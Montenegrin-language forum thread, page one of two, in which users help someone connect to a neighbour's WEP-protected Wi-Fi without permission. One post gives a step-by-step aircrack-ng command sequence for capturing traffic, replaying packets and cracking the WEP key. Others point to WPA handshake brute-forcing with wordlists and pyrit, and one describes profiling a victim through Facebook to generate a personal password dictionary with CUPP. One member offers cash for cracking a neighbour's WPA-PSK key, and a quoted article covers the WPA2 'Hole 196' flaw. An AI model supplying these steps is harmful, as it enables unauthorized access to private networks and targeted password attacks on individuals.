Page 1 of 2 12 LastLast
Results 1 to 25 of 33

Thread: Ako moze pomoc oko WEPkey ?

  1. #1
    Join Date
    Jun 2009
    Location
    Podgorica
    Posts
    2,480
    Thanks Thanks Given 
    1
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default Ako moze pomoc oko WEPkey ?

    Znaci zelio bih da se prikacim na jedan wi-fi network i on je zasticen WEP key-om... Znaci hvatam par njih ali oni imaju onu jacu zastitu WPA2 sto li vec Ovo sam ukapirao da je najlaksa pa postoji li neki nacin da se zakacim na to ? Kucao sam neke passworde koji mogu biti i cak u jednom trenutku sam se i zakacio ,ono pise connected ali ovamo dolje onaj znak uzvika i pise limited acces no internet acces , tako nesto... Ima li nade?
    Para vrti dje burgija neće.

  2. #2
    Join Date
    Sep 2009
    Posts
    3,724
    Thanks Thanks Given 
    1
    Thanks Thanks Received 
    389
    Thanked in
    249 Posts

    Default

    Quote Originally Posted by Chili Willie View Post
    Znaci zelio bih da se prikacim na jedan wi-fi network i on je zasticen WEP key-om... Znaci hvatam par njih ali oni imaju onu jacu zastitu WPA2 sto li vec Ovo sam ukapirao da je najlaksa pa postoji li neki nacin da se zakacim na to ? Kucao sam neke passworde koji mogu biti i cak u jednom trenutku sam se i zakacio ,ono pise connected ali ovamo dolje onaj znak uzvika i pise limited acces no internet acces , tako nesto... Ima li nade?

    male su ti nada a kadbi i uspio mogao kako krivicnu zaglavit

  3. #3
    Join Date
    Sep 2009
    Location
    Underhill
    Posts
    1,745
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    mos preko backtrack-a,proguglaj malo.
    The moon will illuminate my room and soon I'm consumed by my doom

  4. #4
    Join Date
    Aug 2009
    Location
    Biel/Bienne
    Posts
    12,805
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    koliko ja znam,nemoze
    http://www.youtube.com/watch?v=PCjwxItb_p4
    Les chiens aboient, la caravane passe.

  5. #5
    Join Date
    Feb 2008
    Posts
    8,146
    Thanks Thanks Given 
    1,126
    Thanks Thanks Received 
    580
    Thanked in
    339 Posts

    Default

    WEP lagano preko backtrack-a

  6. #6
    Join Date
    Oct 2008
    Location
    >>>>>068 033045
    Posts
    3,297
    Thanks Thanks Given 
    58
    Thanks Thanks Received 
    80
    Thanked in
    54 Posts

    Default

    Skines gore pomenuti BT, upalis konzolu i evo ti komande. Imas dosta programa koji to "rade" i pod win platformom, ali win ne podrzava packet injection, i trebaju neki posebni drajveri za wlan karticu, tako da skini BT i udri

    1.SHELL
    Code:
    airmon-ng
    airodump-ng wlan0
    airodump-ng -w wep -c "channel" --bssid "bssid" wlan0

    2.SHELL
    Code:
    aireplay-ng -1 0 -a "bssid" wlan0

    3.SHELL
    Code:
    aireplay-ng -3 -b "bssid" wlan0

    4.SHELL
    Code:
    aircrack-ng wep-01.cap

  7. #7
    Join Date
    Dec 2010
    Posts
    1
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    nema sanse ne mlatite bzv

  8. #8
    Join Date
    Aug 2009
    Location
    Biel/Bienne
    Posts
    12,805
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    WPA2,nema sanse
    http://www.youtube.com/watch?v=PCjwxItb_p4
    Les chiens aboient, la caravane passe.

  9. #9
    Join Date
    Aug 2009
    Location
    Biel/Bienne
    Posts
    12,805
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    probaj;P
    http://www.youtube.com/watch?v=PCjwxItb_p4
    Les chiens aboient, la caravane passe.

  10. #10
    Join Date
    Aug 2006
    Posts
    7,212
    Thanks Thanks Given 
    1
    Thanks Thanks Received 
    22
    Thanked in
    6 Posts

    Default

    Quote Originally Posted by Chili Willie View Post
    Znaci zelio bih da se prikacim na jedan wi-fi network i on je zasticen WEP key-om... Znaci hvatam par njih ali oni imaju onu jacu zastitu WPA2 sto li vec Ovo sam ukapirao da je najlaksa pa postoji li neki nacin da se zakacim na to ? Kucao sam neke passworde koji mogu biti i cak u jednom trenutku sam se i zakacio ,ono pise connected ali ovamo dolje onaj znak uzvika i pise limited acces no internet acces , tako nesto... Ima li nade?
    Možda ima i MAC address filter ...

  11. #11
    Join Date
    Oct 2008
    Location
    >>>>>068 033045
    Posts
    3,297
    Thanks Thanks Given 
    58
    Thanks Thanks Received 
    80
    Thanked in
    54 Posts

    Default

    Quote Originally Posted by Što_Činiš_Ljepotice View Post
    nema sanse ne mlatite bzv
    pitaj moje komsije imal sanse za to

    Quote Originally Posted by Phénix View Post
    WPA2,nema sanse
    jedino rijecnik, pa udri BF metodom


    Quote Originally Posted by Bøgíñjå View Post
    Možda ima i MAC address filter ...
    tesko, neko ko jos koristi wep zastitu da zna da namjesti mac filtriranje

  12. #12
    Join Date
    Jul 2008
    Location
    G-spot
    Posts
    20,655
    Thanks Thanks Given 
    96
    Thanks Thanks Received 
    113
    Thanked in
    91 Posts

    Default

    WEP glatko i veoma jednostavno, WPA/WPA2 nikako osim ako nije speedtouch na kom nije mijenjan fabrički password

    Quote Originally Posted by Chili Willie View Post
    u jednom trenutku sam se i zakacio ,ono pise connected ali ovamo dolje onaj znak uzvika i pise limited acces no internet acces , tako nesto... Ima li nade?:grin:
    probaj da podesiš TCP-IP
    "Ja i dalje čekam da mi dokažeš da je Sunce kancerogeno.", Bugi

  13. #13
    Join Date
    Sep 2007
    Posts
    972
    Thanks Thanks Given 
    3
    Thanks Thanks Received 
    5
    Thanked in
    3 Posts

    Default

    Quote Originally Posted by Rakun View Post
    WPA/WPA2 nikako osim ako nije speedtouch na kom nije mijenjan fabrički password
    A koji je fabricki password? Ima li neki default?


    Ja sam nesto ceprkao oko probijanja tih enkripcija sa aircrack-om pod Win platformom. Uzeo wifi karticu sa Atheros chipestom i sitgao do koraka kada trebas da postavis komp ukljucen par dana da dekriptuje sakupljene `pakete`, ili kako se vec kaze?! :mrgreen:

  14. #14
    Join Date
    Oct 2008
    Location
    >>>>>068 033045
    Posts
    3,297
    Thanks Thanks Given 
    58
    Thanks Thanks Received 
    80
    Thanked in
    54 Posts

    Default

    moze se i WPA lako provaliti, mada treba vise vremena jer ne podrzava "injekciju paketa". Naci AP kome je postavljen defoltni pass je rijetkost. To sto tebi pise limited acces, bilo koji pass da ukucas posle par trenutaka ce ti to ispisati, tako da nikakva podesavanja ti netrebaju, po difoltu je postavljeno da ti DHCP dodjeljuje automatski adresu, tako da netrebas nista podesavati.

  15. #15
    Join Date
    Mar 2007
    Location
    Podgorica
    Posts
    11,950
    Thanks Thanks Given 
    29
    Thanks Thanks Received 
    912
    Thanked in
    486 Posts

    Default

    Quote Originally Posted by guest View Post

    Da vidimo tog junaka koji ce provaliti WPA2 password za moj wireless.
    bravo ti ga!
    doslo vrjeme da se promijeni potpis :)

  16. #16
    Join Date
    Mar 2007
    Location
    Podgorica
    Posts
    11,950
    Thanks Thanks Given 
    29
    Thanks Thanks Received 
    912
    Thanked in
    486 Posts

    Default

    ne treba mi stoevra

    ne vozim beemvea
    doslo vrjeme da se promijeni potpis :)

  17. #17
    Join Date
    Oct 2010
    Posts
    793
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    Imam ja pitanje

    Ako imam wireless kako da provjerim koji mi je password? dje treba da udjem

    u pitanju je speedtouch modem od extra TV

  18. #18
    Join Date
    Jan 2004
    Location
    Podgorica
    Posts
    12,701
    Thanks Thanks Given 
    2,121
    Thanks Thanks Received 
    1,065
    Thanked in
    502 Posts

    Default

    Quote Originally Posted by JovanK View Post
    moze se i WPA lako provaliti, mada treba vise vremena jer ne podrzava "injekciju paketa".
    sa kojim programom? jesi li to radio vec?
    Quote Originally Posted by guest View Post
    WPA i WPA2 samo pomocu bruteforce-a ukoliko imas handshake.
    sto je handshake?

  19. #19
    Join Date
    Mar 2006
    Posts
    11,279
    Thanks Thanks Given 
    26
    Thanks Thanks Received 
    41
    Thanked in
    29 Posts

    Default


  20. #20
    Join Date
    Nov 2010
    Location
    Podgorica
    Posts
    1,612
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    Quote Originally Posted by Ultras_BR View Post
    Imam ja pitanje

    Ako imam wireless kako da provjerim koji mi je password? dje treba da udjem

    u pitanju je speedtouch modem od extra TV
    idi na t com sajt i trazi manual od rutera ... npr za za d linkov router sa wirelesom,koji se nudi u t com je 192.168.1.1.. posle nadjes opciju wireless/security .. :P
    I don't suffer from insanity.I just enjoy it every moment.

    We are all anonymous.

  21. #21
    Join Date
    Nov 2010
    Location
    Podgorica
    Posts
    1,612
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    ko malo procacka i prouci

    http://www.smallnetbuilder.com/wirel...--wpa2?start=1

    :P srecno .

    a ovo je tekst sa jednog sajta ...

    Well as it tends to be, when something is scrutinized for long enough and with enough depth flaws will be uncovered. This time the victim is WPA2 – the strongest protection for your Wi-fi network which is standardized.

    WEP fell long ago and there’s a myriad of WEP Cracking tools available. In 2008 it was reported flaws had been found in WPA and it was partially cracked.

    These factors of course shifted a lot of people to WPA2, which has now been found to have certain flaws.

    Perhaps it was only a matter of time. But wireless security researchers say they have uncovered a vulnerability in the WPA2 security protocol, which is the strongest form of Wi-Fi encryption and authentication currently standardized and available.

    Malicious insiders can exploit the vulnerability, named “Hole 196″ by the researcher who discovered it at wireless security company AirTight Networks. The moniker refers to the page of the IEEE 802.11 Standard (Revision, 2007) on which the vulnerability is buried. Hole 196 lends itself to man-in-the-middle-style exploits, whereby an internal, authorized Wi-Fi user can decrypt, over the air, the private data of others, inject malicious traffic into the network and compromise other authorized devices using open source software, according to AirTight.

    The researcher who discovered Hole 196, Md Sohail Ahmad, AirTight technology manager, intends to demonstrate it at two conferences taking place in Las Vegas next week: Black Hat Arsenal and DEF CON 18.

    It’s a pretty interesting attack and leverages a man-in-the-middle style exploit to decrypt data from the wire and inject malicious packets onto the network.

    The researched Md Sohail Ahmad is going to demo the exploit at 2 upcoming conferences (Black Hat and DEF CON 18) so I’ll be looking out for the slides and videos on that. We’ll have to wait and see if this is another ‘mostly theoretical‘ attack – or something that can actually be implemented in the wild.

    The Advanced Encryption Standard (AES) derivative on which WPA2 is based has not been cracked and no brute force is required to exploit the vulnerability, Ahmad says. Rather, a stipulation in the standard that allows all clients to receive broadcast traffic from an access point (AP) using a common shared key creates the vulnerability when an authorized user uses the common key in reverse and sends spoofed packets encrypted using the shared group key.

    Ahmad explains it this way:

    WPA2 uses two types of keys: 1) Pairwise Transient Key (PTK), which is unique to each client, for protecting unicast traffic; and 2) Group Temporal Key (GTK) to protect broadcast data sent to multiple clients in a network. PTKs can detect address spoofing and data forgery. “GTKs do not have this property,” according to page 196 of the IEEE 802.11 standard.

    These six words comprise the loophole, Ahmad says.

    The upside is that the attack is limited to people who can genuinely authenticate to the network first, the downside that means large organizations using WPA2 in trouble – as generally most damage comes from the inside.

    It’s also something to think about when connecting to ISP/public Wi-fi hotspots using WPA2 encryption.

    I’m sure there will be more news about this soon.

    I ovaj kod mogu da vam nabavim ako koga bude zanimalo. :P i takodje imam jedan program koji moze da probije sve tri zastite, ali uz njega dodje tutorial kojim bi se morali pozabavit ... no, ako je to kome tolko vazno ... pa ako uspije, nek uzme pare ovome momku gore


    EDIT : lista rijeci : http://wifi0wn.wordpress.com/wepwpaw...ng-dictionary/
    Last edited by b02; 07-12-10 at 15:34.
    I don't suffer from insanity.I just enjoy it every moment.

    We are all anonymous.

  22. #22
    Join Date
    Jan 2004
    Posts
    475
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    2
    Thanked in
    2 Posts

    Default



    Ova je bolja
    Juffo-Wup fills in my fibers and I grow turgid. Violent action ensues.
    Break stuff

  23. #23
    Join Date
    Jan 2004
    Location
    MNE
    Posts
    66,648
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    2
    Thanked in
    2 Posts

    Default

    Quote Originally Posted by b02 View Post

    I ovaj kod mogu da vam nabavim ako koga bude zanimalo. :P i takodje imam jedan program koji moze da probije sve tri zastite, ali uz njega dodje tutorial kojim bi se morali pozabavit ... no, ako je to kome tolko vazno ... pa ako uspije, nek uzme pare ovome momku gore


    EDIT : lista rijeci : http://wifi0wn.wordpress.com/wepwpaw...ng-dictionary/



    Moj komsija ima WPA-PSK. Ful signal kod mene.
    Ako je neko spreman, moze dobit kesa ako mi nadje pass (javite se na pm).
    Hvala.
    TAKUMI

  24. #24
    Join Date
    Jul 2004
    Location
    Parallel Universe
    Posts
    614
    Thanks Thanks Given 
    4
    Thanks Thanks Received 
    2
    Thanked in
    1 Post

    Default

    WPA(2): http://code.google.com/p/pyrit/
    preporuka CUDA GPU.

  25. #25
    Join Date
    Jul 2004
    Location
    Parallel Universe
    Posts
    614
    Thanks Thanks Given 
    4
    Thanks Thanks Received 
    2
    Thanked in
    1 Post

    Default

    Quote Originally Posted by Fabia_Elegance! View Post
    Moj komsija ima WPA-PSK. Ful signal kod mene.
    Ako je neko spreman, moze dobit kesa ako mi nadje pass (javite se na pm).
    Hvala.
    Obično korisnici stavljaju ključ koji je ime/prezime (sebe, žene/djevojke, djeteta), datum, rođenja, broj godina i razne kombinacije toga... I obično su svi na facebooku gdje može lagano da se dođe do svih tih informacija. Kad dođeš to info koristi alat CUPP http://www.remote-exploit.org/?p=546 (autor alata nam je zemljak inače :P) i generiši rečnik za tog korisnika. Alat će te priupitati za osobne detalje osobe koju napadaš i generisati rečnik sa raznim kombinacijama.
    Onda jednostavan dictionary attack će biti dovoljan. Ovo obično prolazi.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Moze pomoc?
    By cocacolica in forum Software
    Replies: 7
    Last Post: 18-01-10, 11:25
  2. Moze pomoc?
    By nexus in forum Software
    Replies: 25
    Last Post: 12-01-10, 00:56
  3. Ako moze pomoc
    By MiLiCa_Hn in forum Sve i svašta
    Replies: 3
    Last Post: 08-05-07, 19:49
  4. Moze pomoc?
    By WOODSTOCK in forum Muzika
    Replies: 10
    Last Post: 21-12-04, 23:31

Bookmarks

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •